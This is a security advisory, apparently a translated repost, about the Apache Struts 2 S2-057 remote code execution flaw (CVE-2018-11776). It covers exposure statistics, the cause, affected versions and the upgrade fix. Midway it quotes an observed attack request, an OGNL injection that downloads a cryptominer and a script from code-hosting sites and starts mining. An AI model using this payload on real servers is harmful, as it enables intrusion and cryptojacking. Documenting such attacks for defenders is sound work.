Hacking Book | Free Online Hacking Learning

Home

white hat safety research institute

Posted by truschel at 2020-02-27
all

On August 22, 2018 Beijing time, the official website of struts 2 announced the latest remote command execution vulnerability, No. s2-057. This vulnerability may cause an attacker to elevate privileges and control the server. As struts 2 is widely used, it is used by domestic government and large enterprises. Please update the latest version or take protective measures in time.

Struts 2 is a web application framework based on MVC design pattern, which has developed into a very mature framework. A large number of websites around the world use this framework for development. Many of them are used by governments and large enterprises.

Struts2 has a total of 281021 countries open to the outside world, the most used country is the United States, with a total of 78459; China is the second 65216; South Korea is the third, with a total of 52421; Ireland is the fourth, with a total of 12944; Uruguay is the fifth, with a total of 12927. In China, Beijing is the largest city, with 15471 in total; Zhejiang Province is the second, with 15249 in total; Guangdong Province is the third, with 5159 in total; Shanghai city is the fourth, with 3564 in total; Jiangsu Province is the fifth, with 3292 in total.

Global distribution (distribution only, not vulnerability impact)

Distribution in China (only distribution, not vulnerability impact)

Principle and harm of loopholes

If the namespace value is not set in the configuration file of Struts2 application (the configuration file is different according to the actual situation of the application), and the namespace of wildcard is not set or used in the action configuration, remote code execution may be caused, as well as the URL tag value and action value are not set in the configuration file, and the namespace is not set or the generic configuration is used The namespace of the character also causes remote code execution. The attack points of the vulnerability include redirect action, action chaining and postback result, which are all the jump modes of struts 2. Users can launch attacks through these three payloads that are passed into the meditation structure.

The vulnerability is serious, and any attacker can use the vulnerability to execute arbitrary commands remotely, resulting in security risks such as server intrusion. Because the namespace of wildcard is disabled, there are some limitations in the actual scenario.

In the following figure, we add the expression ${999 + 999} to the web address. After visiting, we can jump to the address 1998 to prove the successful execution of the statement.

S2-057 vulnerability verification

S2-057 vulnerability detection script

According to baimaohui's observation recently, there have been cases of mining and scanning through POC. The attacker uses the following attack code:

GET /struts3-showcase/$${(#_memberAccess[“allowStaticMethodAccess”]=true,#[email protected]@getRuntime().exec(‘wget -O xrig hxxps://github.com/cnrig/cnrig/releases/download/v0.1.5-release/cnrig-0.1.5-linux-x86_64;wget hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh || curl -L hxxps://bitbucket.org/c646/zz/downloads/upcheck.sh –output upcheck.sh;chmod x xrig;chmod x upcheck.sh;nohup ./upcheck.sh &;nohup ./xrig -a cryptonight -o us-east.cryptonight-hub.miningpoolhub.com:20580 -u c646.miner -p x &;rm xrig’).getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#[email protected]@getResponse().getWriter(),#sbtest.println(#d),#sbtest.close())}/actionChain1.action HTTP/1.1 攻击者利用上述代码用来传播挖矿木马从事挖矿活动。攻击者将程序使通过github.com和bitbucket.org两个代码托管平台作为媒介来传播。

Vulnerability impact

The vulnerability versions include struts 2.3 - struts 2.3.34, struts 2.5 - struts 2.5.16. In addition, other versions may also be affected.

Vulnerability POC

The POC has been included in the fofa client. You can view or follow this link later (https://nosec.org/home/detail/1755.html).

CVE number

CVE-2018-11776

Restoration proposal

1. This vulnerability has been fixed in the official new version. It is recommended to upgrade to Apache struts version 2.3.35 or 2.5.17 directly. The official download address is https://archive.apache.org/dist/struts/

Reference resources

[1] https://cwiki.apache.org/confluence/display/WW/S2-057

[2]https://lgtm.com/blog/apache_struts_CVE-2018-11776

[3] https://www.volexity.com/blog/2018/08/27/active-exploitation-of-new-apache-struts-vulnerability-cve-2018-11776-deploys-cryptocurrency-miner/